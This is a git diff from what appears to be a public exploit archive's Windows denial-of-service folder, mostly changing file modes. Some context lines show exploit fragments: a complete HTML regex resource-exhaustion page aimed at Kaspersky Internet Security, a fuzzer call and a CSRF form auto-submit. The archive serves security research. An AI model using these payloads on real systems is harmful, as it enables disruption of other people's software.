--git a/platforms/windows/dos/37875.txt b/platforms/windows/dos/37875.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3788.html b/platforms/windows/dos/3788.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37883.txt b/platforms/windows/dos/37883.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37884.txt b/platforms/windows/dos/37884.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3789.html b/platforms/windows/dos/3789.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3790.html b/platforms/windows/dos/3790.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37905.rb b/platforms/windows/dos/37905.rb index eea7b82ca..dc333e4d2 100755 --- a/platforms/windows/dos/37905.rb +++ b/platforms/windows/dos/37905.rb @@ -51,4 +51,4 @@ overflow exception disconnect end -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/windows/dos/37909.txt b/platforms/windows/dos/37909.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37910.txt b/platforms/windows/dos/37910.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37911.txt b/platforms/windows/dos/37911.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37912.txt b/platforms/windows/dos/37912.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37913.txt b/platforms/windows/dos/37913.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37914.txt b/platforms/windows/dos/37914.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37915.txt b/platforms/windows/dos/37915.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37916.txt b/platforms/windows/dos/37916.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37917.txt b/platforms/windows/dos/37917.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37918.txt b/platforms/windows/dos/37918.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37919.txt b/platforms/windows/dos/37919.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37920.txt b/platforms/windows/dos/37920.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37921.txt b/platforms/windows/dos/37921.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37922.txt b/platforms/windows/dos/37922.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37923.txt b/platforms/windows/dos/37923.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37924.txt b/platforms/windows/dos/37924.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37957.txt b/platforms/windows/dos/37957.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37966.txt b/platforms/windows/dos/37966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37967.txt b/platforms/windows/dos/37967.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37986.txt b/platforms/windows/dos/37986.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38053.txt b/platforms/windows/dos/38053.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38054.txt b/platforms/windows/dos/38054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38055.txt b/platforms/windows/dos/38055.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38108.txt b/platforms/windows/dos/38108.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38146.html b/platforms/windows/dos/38146.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38165.txt b/platforms/windows/dos/38165.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38177.txt b/platforms/windows/dos/38177.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38214.txt b/platforms/windows/dos/38214.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38215.txt b/platforms/windows/dos/38215.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38216.txt b/platforms/windows/dos/38216.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38217.txt b/platforms/windows/dos/38217.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38225.txt b/platforms/windows/dos/38225.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3826.html b/platforms/windows/dos/3826.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38272.txt b/platforms/windows/dos/38272.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38281.txt b/platforms/windows/dos/38281.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38282.txt b/platforms/windows/dos/38282.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38283.txt b/platforms/windows/dos/38283.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38284.txt b/platforms/windows/dos/38284.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38285.txt b/platforms/windows/dos/38285.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38286.txt b/platforms/windows/dos/38286.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38288.txt b/platforms/windows/dos/38288.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3830.html b/platforms/windows/dos/3830.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38317.txt b/platforms/windows/dos/38317.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38344.txt b/platforms/windows/dos/38344.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38348.txt b/platforms/windows/dos/38348.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3836.html b/platforms/windows/dos/3836.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38419.txt b/platforms/windows/dos/38419.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3845.html b/platforms/windows/dos/3845.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38485.py b/platforms/windows/dos/38485.py index 8827a6548..f3acbfd12 100755 --- a/platforms/windows/dos/38485.py +++ b/platforms/windows/dos/38485.py @@ -39,4 +39,4 @@ audiofile.tag.artist = value audiofile.tag.album = u'andrea' audiofile.tag.album_artist = u'sindoni' -audiofile.tag.save() \ No newline at end of file +audiofile.tag.save() \ No newline at end of file diff --git a/platforms/windows/dos/385.c b/platforms/windows/dos/385.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38580.txt b/platforms/windows/dos/38580.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38615.txt b/platforms/windows/dos/38615.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38617.txt b/platforms/windows/dos/38617.txt old mode 100755 new mode 100644 index 1af406d79..607bfc727 --- a/platforms/windows/dos/38617.txt +++ b/platforms/windows/dos/38617.txt @@ -221,4 +221,4 @@ FAILURE_ID_HASH: {031149d8-0626-9042-d8b7-a1766b1c5514} Followup: MachineOwner --------- -To fix the issue, mymemreplace should validate that the computed value new_len has not overflowed. To do this, (new_len - len) / nfound should be compared to sub_len - pat_len. If that are not equal, an overflow has occurred. \ No newline at end of file +To fix the issue, mymemreplace should validate that the computed value new_len has not overflowed. To do this, (new_len - len) / nfound should be compared to sub_len - pat_len. If that are not equal, an overflow has occurred. \ No newline at end of file diff --git a/platforms/windows/dos/38618.txt b/platforms/windows/dos/38618.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3866.html b/platforms/windows/dos/3866.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38701.txt b/platforms/windows/dos/38701.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38702.txt b/platforms/windows/dos/38702.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38703.txt b/platforms/windows/dos/38703.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38713.txt b/platforms/windows/dos/38713.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38714.txt b/platforms/windows/dos/38714.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3873.html b/platforms/windows/dos/3873.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38734.txt b/platforms/windows/dos/38734.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38735.txt b/platforms/windows/dos/38735.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38736.txt b/platforms/windows/dos/38736.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38747.py b/platforms/windows/dos/38747.py index 1df0881c8..9de495a75 100755 --- a/platforms/windows/dos/38747.py +++ b/platforms/windows/dos/38747.py @@ -42,4 +42,4 @@ print "Building graph" sess.connect(s_get("HTTP")) print "Starting fuzzing now" -sess.fuzz() \ No newline at end of file +sess.fuzz() \ No newline at end of file diff --git a/platforms/windows/dos/38761.py b/platforms/windows/dos/38761.py index 56dace34e..2283f5c3d 100755 --- a/platforms/windows/dos/38761.py +++ b/platforms/windows/dos/38761.py @@ -18,5 +18,4 @@ file.write(buffer) file.close() -# Follow on twitter @vik.create - \ No newline at end of file +# Follow on twitter @vik.create \ No newline at end of file diff --git a/platforms/windows/dos/38787.txt b/platforms/windows/dos/38787.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38788.txt b/platforms/windows/dos/38788.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38789.txt b/platforms/windows/dos/38789.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38793.txt b/platforms/windows/dos/38793.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38794.txt b/platforms/windows/dos/38794.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38795.txt b/platforms/windows/dos/38795.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38796.txt b/platforms/windows/dos/38796.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3883.html b/platforms/windows/dos/3883.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38858.txt b/platforms/windows/dos/38858.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38878.txt b/platforms/windows/dos/38878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3890.html b/platforms/windows/dos/3890.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3891.html b/platforms/windows/dos/3891.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38916.html b/platforms/windows/dos/38916.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38934.txt b/platforms/windows/dos/38934.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/38972.html b/platforms/windows/dos/38972.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3898.html b/platforms/windows/dos/3898.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39019.txt b/platforms/windows/dos/39019.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39020.txt b/platforms/windows/dos/39020.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39021.txt b/platforms/windows/dos/39021.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39022.txt b/platforms/windows/dos/39022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39025.txt b/platforms/windows/dos/39025.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39037.php b/platforms/windows/dos/39037.php old mode 100755 new mode 100644 index f5018f84f..712ab5b84 --- a/platforms/windows/dos/39037.php +++ b/platforms/windows/dos/39037.php @@ -42,4 +42,4 @@ $content = preg_replace( echo 'If you can see this everything seems to be working fine.'; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/windows/dos/39040.txt b/platforms/windows/dos/39040.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39041.txt b/platforms/windows/dos/39041.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39042.txt b/platforms/windows/dos/39042.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39044.txt b/platforms/windows/dos/39044.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39045.txt b/platforms/windows/dos/39045.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39046.txt b/platforms/windows/dos/39046.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39047.txt b/platforms/windows/dos/39047.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39048.txt b/platforms/windows/dos/39048.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39049.txt b/platforms/windows/dos/39049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39050.txt b/platforms/windows/dos/39050.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39051.txt b/platforms/windows/dos/39051.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39052.txt b/platforms/windows/dos/39052.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39053.txt b/platforms/windows/dos/39053.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39054.txt b/platforms/windows/dos/39054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39055.txt b/platforms/windows/dos/39055.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39056.txt b/platforms/windows/dos/39056.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39070.txt b/platforms/windows/dos/39070.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3910.html b/platforms/windows/dos/3910.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39103.txt b/platforms/windows/dos/39103.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39125.html b/platforms/windows/dos/39125.html old mode 100755 new mode 100644 index 5c6bb40eb..d8af82f3d --- a/platforms/windows/dos/39125.html +++ b/platforms/windows/dos/39125.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to exhaust available CPU and memory resources Kaspersky Internet Security 14.0.0.4651 is vulnerable; other versions may also be affected. -<HTML> <HEAD> <TITLE>RegExp Resource Exhaustion </TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF"> <SCRIPT type="text/javascript"> var patt1=new RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)"); document.write(patt1.exec("peace")); </SCRIPT> </BODY> </HTML> \ No newline at end of file +<HTML> <HEAD> <TITLE>RegExp Resource Exhaustion </TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF"> <SCRIPT type="text/javascript"> var patt1=new RegExp("(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(. *(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10 }(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).* )+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+)"); document.write(patt1.exec("peace")); </SCRIPT> </BODY> </HTML> \ No newline at end of file diff --git a/platforms/windows/dos/39144.html b/platforms/windows/dos/39144.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39158.txt b/platforms/windows/dos/39158.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3917.html b/platforms/windows/dos/3917.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39208.c b/platforms/windows/dos/39208.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3921.html b/platforms/windows/dos/3921.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39220.txt b/platforms/windows/dos/39220.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39232.txt b/platforms/windows/dos/39232.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39233.txt b/platforms/windows/dos/39233.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39275.txt b/platforms/windows/dos/39275.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3929.txt b/platforms/windows/dos/3929.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3930.txt b/platforms/windows/dos/3930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39330.txt b/platforms/windows/dos/39330.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39353.txt b/platforms/windows/dos/39353.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3937.html b/platforms/windows/dos/3937.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39393.txt b/platforms/windows/dos/39393.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39395.txt b/platforms/windows/dos/39395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39396.txt b/platforms/windows/dos/39396.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39397.txt b/platforms/windows/dos/39397.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39398.txt b/platforms/windows/dos/39398.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39428.txt b/platforms/windows/dos/39428.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39429.txt b/platforms/windows/dos/39429.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39430.txt b/platforms/windows/dos/39430.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39431.txt b/platforms/windows/dos/39431.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39444.txt b/platforms/windows/dos/39444.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39452.txt b/platforms/windows/dos/39452.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39471.txt b/platforms/windows/dos/39471.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39472.txt b/platforms/windows/dos/39472.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39509.txt b/platforms/windows/dos/39509.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39512.txt b/platforms/windows/dos/39512.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39518.txt b/platforms/windows/dos/39518.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39530.txt b/platforms/windows/dos/39530.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39533.txt b/platforms/windows/dos/39533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39546.txt b/platforms/windows/dos/39546.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39560.txt b/platforms/windows/dos/39560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39561.txt b/platforms/windows/dos/39561.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39562.html b/platforms/windows/dos/39562.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39565.txt b/platforms/windows/dos/39565.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39600.txt b/platforms/windows/dos/39600.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39601.txt b/platforms/windows/dos/39601.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39602.txt b/platforms/windows/dos/39602.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39603.txt b/platforms/windows/dos/39603.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39605.txt b/platforms/windows/dos/39605.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39606.txt b/platforms/windows/dos/39606.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39608.txt b/platforms/windows/dos/39608.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39609.txt b/platforms/windows/dos/39609.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39610.txt b/platforms/windows/dos/39610.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39611.txt b/platforms/windows/dos/39611.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39612.txt b/platforms/windows/dos/39612.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39613.txt b/platforms/windows/dos/39613.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39647.txt b/platforms/windows/dos/39647.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39648.txt b/platforms/windows/dos/39648.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39663.html b/platforms/windows/dos/39663.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3969.html b/platforms/windows/dos/3969.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39699.html b/platforms/windows/dos/39699.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39713.c b/platforms/windows/dos/39713.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3973.html b/platforms/windows/dos/3973.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39740.cpp b/platforms/windows/dos/39740.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39743.txt b/platforms/windows/dos/39743.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39770.txt b/platforms/windows/dos/39770.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39774.html b/platforms/windows/dos/39774.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39778.txt b/platforms/windows/dos/39778.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39779.txt b/platforms/windows/dos/39779.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39785.cs b/platforms/windows/dos/39785.cs old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3979.html b/platforms/windows/dos/3979.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39819.txt b/platforms/windows/dos/39819.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39832.txt b/platforms/windows/dos/39832.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39833.txt b/platforms/windows/dos/39833.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39846.txt b/platforms/windows/dos/39846.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39857.txt b/platforms/windows/dos/39857.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3986.html b/platforms/windows/dos/3986.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39915.c b/platforms/windows/dos/39915.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39959.txt b/platforms/windows/dos/39959.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39960.txt b/platforms/windows/dos/39960.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39966.txt b/platforms/windows/dos/39966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39990.txt b/platforms/windows/dos/39990.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39991.txt b/platforms/windows/dos/39991.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/39994.html b/platforms/windows/dos/39994.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40074.txt b/platforms/windows/dos/40074.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4009.html b/platforms/windows/dos/4009.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4011.html b/platforms/windows/dos/4011.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4012.html b/platforms/windows/dos/4012.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4017.cpp b/platforms/windows/dos/4017.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40253.html b/platforms/windows/dos/40253.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40255.txt b/platforms/windows/dos/40255.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40256.txt b/platforms/windows/dos/40256.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40257.txt b/platforms/windows/dos/40257.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40298.py b/platforms/windows/dos/40298.py index ab76c9ab9..2bf6e922a 100755 --- a/platforms/windows/dos/40298.py +++ b/platforms/windows/dos/40298.py @@ -130,4 +130,4 @@ data: newPassword=mypassword document.forms[0].submit(); </script> -</body></html> \ No newline at end of file +</body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40374.html b/platforms/windows/dos/40374.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40398.txt b/platforms/windows/dos/40398.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40399.txt b/platforms/windows/dos/40399.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40406.txt b/platforms/windows/dos/40406.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40411.txt b/platforms/windows/dos/40411.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4044.txt b/platforms/windows/dos/4044.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4047.c b/platforms/windows/dos/4047.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40508.txt b/platforms/windows/dos/40508.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40509.txt b/platforms/windows/dos/40509.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/4056.html b/platforms/windows/dos/4056.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/40598.txt 